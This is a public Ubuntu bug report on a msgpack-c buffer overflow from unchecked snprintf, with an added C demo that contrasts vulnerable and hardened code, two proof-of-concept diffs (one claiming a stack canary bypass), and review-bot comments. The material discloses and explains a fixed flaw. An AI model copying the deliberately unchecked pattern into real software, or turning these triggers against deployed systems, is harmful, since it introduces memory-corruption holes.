buffer overflow in msgpack_object_print_buffer

Bug #1861448 reported by ddaa
Affects              Status      Importance   Assigned to   Milestone
msgpack-c (Ubuntu)   Confirmed   Undecided    Unassigned

Bug Description

`msgpack_object_print_buffer` didn't check the return value of `snprintf`; this causes a buffer overflow when printing an array (or a map) that contains multiple objects.

Upstream fixed the problem in version 3.2.1.
https://github.com/msgpack/msgpack-c/issues/774

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: libmsgpackc2 2.1.5-1
ProcVersionSignature: Ubuntu 4.15.0-55.60-generic 4.15.18
Uname: Linux 4.15.0-55-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.7
Architecture: amd64
Date: Thu Jan 30 18:54:19 2020
Dependencies:
 gcc-8-base 8.3.0-6ubuntu1~18.04.1
 libc6 2.27-3ubuntu1
 libgcc1 1:8.3.0-6ubuntu1~18.04.1
InstallationDate: Installed on 2018-01-11 (749 days ago)
InstallationMedia: Ubuntu-Server 16.04.3 LTS "Xenial Xerus" - Release amd64 (20170801)
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: msgpack-c
UpgradeStatus: Upgraded to bionic on 2019-06-05 (239 days ago)
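The pattern the report describes, as an added illustration that is not msgpack-c's code: a simplified printer for an array of strings that uses the same snprintf-then-advance loop, beside a hardened version that validates each `snprintf` result before moving the cursor, plus a harness that runs both on a constructed input inside a heap block with a guard region so the out-of-bounds write can be observed. `str_array`, `print_array_unchecked`, `print_array_checked`, `probe` and the 32-byte window are assumptions of this example; the hardened check is this example's own and is not a claim about what the upstream 3.2.1 change looks like.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

/* Hypothetical stand-in for an array object: a list of strings printed as
 * ["a", "b", ...]. It is not msgpack's msgpack_object. */
typedef struct {
    const char **items;
    size_t count;
} str_array;

/* Vulnerable pattern: snprintf's return value moves the cursor and shrinks
 * `remaining` without a truncation check. When the output does not fit,
 * snprintf returns the length it *wanted* to write, so the cursor jumps past
 * the end of the buffer and `remaining` underflows to a huge size_t, which
 * removes the bound from every later write. */
int print_array_unchecked(char *buf, size_t size, const str_array *a)
{
    char *cur = buf;
    size_t remaining = size;
    size_t i;
    int ret;

    ret = snprintf(cur, remaining, "[");
    cur += ret;
    remaining -= ret;
    for (i = 0; i < a->count; i++) {
        if (i > 0) {
            ret = snprintf(cur, remaining, ", ");
            cur += ret;
            remaining -= ret;
        }
        ret = snprintf(cur, remaining, "\"%s\"", a->items[i]);
        cur += ret;
        remaining -= ret;
    }
    ret = snprintf(cur, remaining, "]");  /* written wherever the cursor now points */
    cur += ret;
    return (int)(cur - buf);              /* final cursor offset; may exceed size */
}

/* Hardened variant (this example's own fix): ret < 0 is an encoding error and
 * ret >= remaining means the output was truncated (snprintf has already
 * NUL-terminated the part that fit). In both cases stop instead of advancing. */
static bool advance(char **cur, size_t *remaining, int ret)
{
    if (ret < 0 || (size_t)ret >= *remaining)
        return false;
    *cur += ret;
    *remaining -= (size_t)ret;
    return true;
}

int print_array_checked(char *buf, size_t size, const str_array *a)
{
    char *cur = buf;
    size_t remaining = size;
    size_t i;

    if (!advance(&cur, &remaining, snprintf(cur, remaining, "[")))
        return -1;
    for (i = 0; i < a->count; i++) {
        if (i > 0 && !advance(&cur, &remaining, snprintf(cur, remaining, ", ")))
            return -1;
        if (!advance(&cur, &remaining, snprintf(cur, remaining, "\"%s\"", a->items[i])))
            return -1;
    }
    if (!advance(&cur, &remaining, snprintf(cur, remaining, "]")))
        return -1;
    return (int)(cur - buf);
}

#define WINDOW_SIZE 32   /* size the print functions are told they have */
#define GUARD_SIZE  256  /* bytes we own beyond the window, to observe overruns */

typedef struct {
    int ret;           /* return value of the print function */
    size_t clobbered;  /* guard bytes past the window that were modified */
    size_t len;        /* strlen of the window after the call */
} probe_result;

/* Runs one print function on a WINDOW_SIZE-byte window at the start of a larger
 * heap block filled with 0xAA, then counts guard bytes that changed. Keeping the
 * out-of-bounds write inside memory we own makes the vulnerable variant's
 * behaviour observable rather than undefined. */
probe_result probe(int (*fn)(char *, size_t, const str_array *))
{
    /* Constructed sample: the third element (40 'a') cannot fit a 32-byte window. */
    const char *items[] = { "1", "true", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" };
    str_array a = { items, 3 };
    probe_result r;
    size_t i;
    /* volatile hides the allocation size from the compiler so a fortified
     * snprintf (_FORTIFY_SOURCE) cannot abort the vulnerable run early and
     * mask the overrun we want to observe. */
    char *volatile backing = malloc(WINDOW_SIZE + GUARD_SIZE);
    char *p = backing;

    memset(p, 0xAA, WINDOW_SIZE + GUARD_SIZE);
    r.ret = fn(p, WINDOW_SIZE, &a);
    r.len = strlen(p);
    r.clobbered = 0;
    for (i = WINDOW_SIZE; i < WINDOW_SIZE + GUARD_SIZE; i++)
        if ((unsigned char)p[i] != 0xAA)
            r.clobbered++;
    free(p);
    return r;
}

int main(void)
{
    probe_result v = probe(print_array_unchecked);
    probe_result h = probe(print_array_checked);
    printf("unchecked: ret=%d guard bytes clobbered=%zu\n", v.ret, v.clobbered);
    printf("checked:   ret=%d guard bytes clobbered=%zu\n", h.ret, h.clobbered);
    return 0;
}
```

With glibc the unchecked run reports a final cursor offset of 57 and two modified guard bytes: the truncated write of the 40-character string returned 42, the cursor advanced by that amount to offset 56, and the closing `]` with its NUL terminator landed 24 bytes past the end of the 32-byte window. The checked run stops at the same element, returns -1, and leaves the window NUL-terminated with nothing written beyond it. A libc that rejects sizes above INT_MAX (musl returns -1 with EOVERFLOW) refuses the final wrapped-size write instead of performing it; the cursor offset still shows the overrun, which is why the harness reports both values.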

Revision history for this message
ddaa (0xddaa) wrote :

Proof of concept:
(http://github.com/msgpack/msgpack-c)

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..041d8983 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
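Review bot: the only change in this hunk, `UNPACKED_BUFFER_SIZE` from 2048 to 64, is what makes the truncation reachable, but nothing in the diff says so; a comment on the `#define` stating that the buffer is deliberately smaller than the printed form of the array built in `prepare()` would tell a reader which constant to tune when reproducing.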
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);
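Review bot: `msgpack_pack_str(&pk, 64)` and the 64-byte literal passed to `msgpack_pack_str_body` must agree exactly, and a literal of 64 repeated characters is easy to miscount when the PoC is edited; declaring the payload once (`static const char payload[] = "aaa...";`) and passing `sizeof(payload) - 1` to both calls removes the duplicated length. A short comment marking this element as the one that no longer fits the 64-byte print buffer would also help.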

Revision history for this message
ddaa (0xddaa) wrote :

Proof of concept 2:
stack canary check can be bypassed if the length of data is controllable.

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..75710638 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
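Review bot: this hunk is identical to the first hunk of the previous PoC, so the second diff cannot be applied on top of the first; it is worth stating that the two diffs are alternatives against the unmodified example file, or folding both into one diff with the payload length as a macro next to `UNPACKED_BUFFER_SIZE`.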
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64+16);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64+16);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);
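Review bot: `64+16` is presented as the length that skips the canary, but the hunk gives no rationale for the 16; a comment stating which offset past the 64-byte `UNPACKED_BUFFER_SIZE` window the out-of-bounds write is expected to land at, and how that offset was determined, would let a reviewer check the canary-bypass claim instead of taking it on trust. As in the first PoC, the 80-character literal and the `64+16` length should come from one definition.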

information type: Private Security → Public Security
Changed in msgpack-c (Ubuntu):
status: New → Confirmed